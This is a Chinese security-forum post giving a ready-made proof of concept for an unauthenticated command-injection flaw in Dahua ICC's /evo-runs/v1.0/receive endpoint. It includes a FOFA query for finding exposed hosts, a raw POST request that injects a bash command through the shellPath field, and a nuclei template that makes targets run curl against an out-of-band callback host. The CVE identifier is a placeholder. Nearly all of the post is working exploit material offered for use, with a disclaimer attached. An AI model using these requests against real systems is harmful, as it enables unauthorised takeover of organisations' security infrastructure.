大华icc /evo-runs/v1.0/receive RCE-网络安全论坛-网络安全-阻击者联盟

大华icc /evo-runs/v1.0/receive RCE

免责声明

       请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

漏洞描述:

大华icc /evo-runs/v1.0/receive 接口存在远程命令执行漏洞

影响版本:

大华icc

FOFA:

icon_hash="-1935899595"

POC

POST /evo-runs/v1.0/receive HTTP/1.1
Host: 
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 249
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/41.0.2224.3 Safari/537.36
X-Subject-Headerflag: ADAPT

{
 "method": "agent.ossm.mapping.config",
 "info": {
 "configure": "abcd",
 "filePath": "haha",
 "paramMap": {
 "shellPath": "/bin/bash -c df>/opt/evoWpms/static/macvguun.txt",
 "filePath": "abc"
 },
 "requestIp": ""
 }
}

将df命令执行的结果写入macvguun.txt文件中。

nuclei POC:

id: CVE-2025-XXXXX

info:
  name: Dahua ICC evo-runsv1.0 RCE
  author: ProjectDiscoveryAI
  severity: critical
  description: |
    Dahua ICC evo-runsv1.0 contains a remote code execution vulnerability in the /evo-runs/v1.0/receive endpoint
    via the agent.ossm.mapping.config method that allows unauthenticated attackers to execute arbitrary system commands.
  reference:
    - https://www.dahuatech.com/security
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-XXXXX
    - https://cwe.mitre.org/data/definitions/78.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-78
  metadata:
    verified: true
    max-request: 1
    vendor: dahua
    product: icc-evo-runsv1.0
    fofa-query: app="Dahua-ICC"
  tags: cve,cve2025,dahua,icc,rce,oast,blind

variables:
  oast: "{{interactsh-url}}"

http:
  - raw:
      - |
        POST /evo-runs/v1.0/receive HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
        Accept: application/json, text/plain, */*
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        Content-Type: application/json
        Connection: close

        {
          "method": "agent.ossm.mapping.config",
          "info": {
            "configure": "test",
            "filePath": "test",
            "paramMap": {
              "shellPath": "curl {{oast}}",
              "filePath": "test"
            },
            "requestIp": "127.0.0.1"
          }
        }

    matchers-condition: or
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
          - "dns"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: interactsh_request
        group: 1
        regex:
          - "(curl.*)"

 

请登录后发表评论

    没有回复内容